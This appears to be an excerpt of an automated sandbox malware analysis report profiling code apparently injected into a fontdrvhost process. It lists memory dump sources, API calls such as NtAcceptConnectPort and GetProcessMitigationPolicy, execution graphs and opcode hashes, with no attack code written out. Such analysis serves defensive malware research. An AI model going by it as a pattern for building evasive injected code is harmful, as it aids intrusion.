                                                                                                                                                                                                                                                                                                                          • Source File: 0000001D.00000003.2721225658.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_29_3_2aa0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                                                          • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 513e4dc0d6d41db641a2d30986f35196e312e936b0e1a6e5893048b2110b2515
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D611BB1900209EFDB20DFA5C984ADEBBB9FF08354F14852AE959A7240D770A980CF60
                                                                                                                                                                                                                                                                                                                          Function 02AA00A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02AA00CD
                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02AA0279
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 0000001D.00000003.2721225658.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_29_3_2aa0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6256360e4b59aadbe7ba8dd82ec694c64cae28c6b3b4c937e17b45b3d2576757
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1718771A0424ADFDB41CF98C991BEEBBF0EF09314F284095E5A5FB241C734AA95CB64

                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                          Execution Coverage:33.4%
                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                          Signature Coverage:83.3%
                                                                                                                                                                                                                                                                                                                          Total number of Nodes:24
                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                                          execution_graph 415 1b9a47b1cf4 416 1b9a47b1d19 415->416 417 1b9a47b1fa1 416->417 426 1b9a47b15c0 416->426 419 1b9a47b1f98 CloseHandle 419->417 420 1b9a47b1f88 NtAcceptConnectPort 420->419 421 1b9a47b1e3a 421->419 421->420 422 1b9a47b1ecd 421->422 429 1b9a47b0ac8 421->429 422->422 435 1b9a47b1aa4 NtAcceptConnectPort 422->435 428 1b9a47b15f4 NtAcceptConnectPort 426->428 428->421 430 1b9a47b0c62 429->430 431 1b9a47b0ae8 429->431 430->422 431->430 432 1b9a47b0be8 NtAcceptConnectPort 431->432 432->430 433 1b9a47b0c1b 432->433 433->430 434 1b9a47b0c33 NtAcceptConnectPort 433->434 434->430 436 1b9a47b1c04 435->436 437 1b9a47b1af7 435->437 436->420 441 1b9a47b1870 437->441 439 1b9a47b1b10 440 1b9a47b1bb6 NtAcceptConnectPort 439->440 440->436 443 1b9a47b1889 441->443 442 1b9a47b1949 442->439 443->442 444 1b9a47b1930 GetProcessMitigationPolicy 443->444 444->442

                                                                                                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                                          Function 000001B9A47B1CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000021.00000002.2932627738.000001B9A47B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B9A47B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_1b9a47b0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 3811980168-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5cfb01dd10e05f0c896130b467657ae069bf562194161f1460e2f5e9ae2849b9
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E91B630508E488FD765EF28C485BE573E1FB98350F14465EE59BC72A6EB74B8438781
                                                                                                                                                                                                                                                                                                                          Function 000001B9A47B0AC8 Relevance: 3.2, APIs: 2, Instructions: 185nativeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000021.00000002.2932627738.000001B9A47B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B9A47B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_1b9a47b0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                                                                          • Instruction ID: ccb2026982c3626051dcf05697ff7449db9aa226f30da501d00f93a6f9e10e18
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59512734518AD50AE33DA63888996B9B7D4F781305F34455ED2F3C72A3EB34D5478782
                                                                                                                                                                                                                                                                                                                          Function 000001B9A47B1AA4 Relevance: 3.2, APIs: 2, Instructions: 150nativeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000021.00000002.2932627738.000001B9A47B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B9A47B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_1b9a47b0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 2923266908-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 612b324f11e0e85102062ad48376b16f78d41fa293b1830e7e4fcfd5f330e2df
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C41D230208B888FDB44DF2C9889BA57BD1EB55320F04439EE95ACB3D7DB34D94A8795
                                                                                                                                                                                                                                                                                                                          Function 000001B9A47B15C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 118 1b9a47b15c0-1b9a47b15f2 119 1b9a47b15f4-1b9a47b15f7 118->119 120 1b9a47b15f9-1b9a47b15fb 118->120 121 1b9a47b161f-1b9a47b166d NtAcceptConnectPort 119->121 122 1b9a47b160b-1b9a47b160d 120->122 123 1b9a47b15fd-1b9a47b1609 120->123 124 1b9a47b160f-1b9a47b161b 122->124 125 1b9a47b161d 122->125 123->121 124->121 125->121
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,000001B9A47B1E3A), ref: 000001B9A47B1654
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000021.00000002.2932627738.000001B9A47B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B9A47B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_1b9a47b0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                                                                          • Instruction ID: ef2b86aa2e7199ca263c583df8123f4a1c84f20d2d18544d78a37344947b9719
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D216671508B448FDB54DF28C4C96A5B7E1FB68345F140A6EE54AC7360DB31D886CB41
                                                                                                                                                                                                                                                                                                                          Function 000001B9A47B1870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                          control_flow_graph 95 1b9a47b1870-1b9a47b18a0 call 1b9a47b08a4 * 2 100 1b9a47b1954-1b9a47b195b 95->100 101 1b9a47b18a6-1b9a47b18a9 95->101 101->100 102 1b9a47b18af-1b9a47b18b9 101->102 102->100 103 1b9a47b18bf-1b9a47b18c4 102->103 103->100 104 1b9a47b18ca-1b9a47b18d7 103->104 104->100 105 1b9a47b18d9-1b9a47b18e1 104->105 105->100 106 1b9a47b18e3-1b9a47b18ee 105->106 106->100 107 1b9a47b18f0-1b9a47b18f7 106->107 107->100 108 1b9a47b18f9-1b9a47b18fc 107->108 108->100 109 1b9a47b18fe-1b9a47b1906 108->109 109->100 110 1b9a47b1908-1b9a47b190b 109->110 110->100 111 1b9a47b190d-1b9a47b1916 110->111 111->100 112 1b9a47b1918-1b9a47b191c 111->112 112->100 113 1b9a47b191e-1b9a47b192e 112->113 113->100 115 1b9a47b1930-1b9a47b1947 GetProcessMitigationPolicy 113->115 115->100 116 1b9a47b1949-1b9a47b194e 115->116 116->100 117 1b9a47b1950-1b9a47b1951 116->117 117->100
                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000021.00000002.2932627738.000001B9A47B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B9A47B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_1b9a47b0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                                                                          • Instruction ID: b693dc226ac6723e3101482196ee3d69d0b6477b788be92ef45df045b18ee00e
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3131B430100BC74AFBA5977888A97F172D0EB94390F1441B9C217D72E9EB79E98BC780

                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                          Function 000001B9A47B0511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                          • Source File: 00000021.00000002.2932627738.000001B9A47B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001B9A47B0000, based on PE: false
                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_1b9a47b0000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                          • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F